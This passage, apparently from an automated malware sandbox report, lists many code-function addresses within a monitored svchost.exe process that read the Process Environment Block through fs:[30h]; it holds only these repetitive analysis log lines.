Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]	2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]	2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]	2_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]	2_2_0390634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]	2_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]	2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]	2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]	2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]	2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]	2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]	2_2_039062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]	2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]	2_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]	2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]	2_2_0390625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]	2_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]	2_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]	2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]	2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]	2_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]	2_2_03870185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]	2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]	2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]	2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]	2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]	2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]	2_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]	2_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]	2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]	2_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]	2_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]	2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]	2_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]	2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]	2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]	2_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]	2_2_038280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]	2_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]	2_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]	2_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]	2_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]	2_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]	2_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]	2_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]	2_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]	2_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]	2_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]	2_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]	2_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]	2_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]	2_2_038D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]	2_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]	2_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]	2_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]	2_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]	2_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]	2_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]	2_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]	2_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]	2_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]	2_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]	2_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]	2_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]	2_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]	2_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]	2_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]	2_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]	2_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]	2_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]	2_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]	2_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]	2_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]	2_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]	2_2_03872619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]	2_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]	2_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]	2_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]	2_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]	2_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]	2_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]	2_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]	2_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]	2_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]	2_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]	2_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]	2_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]	2_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]	2_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]	2_2_038365D0
